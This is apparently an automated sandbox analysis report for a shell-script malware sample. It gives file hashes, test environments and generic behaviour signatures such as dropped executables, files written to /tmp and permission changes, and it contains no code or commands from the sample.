Analysis
-
max time kernel
61s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
-
Size
10KB
-
MD5
3aaf11d0f07a6e2ac3ecd444e17b7264
-
SHA1
20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
-
SHA256
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
-
SHA512
d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
-
SSDEEP
192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97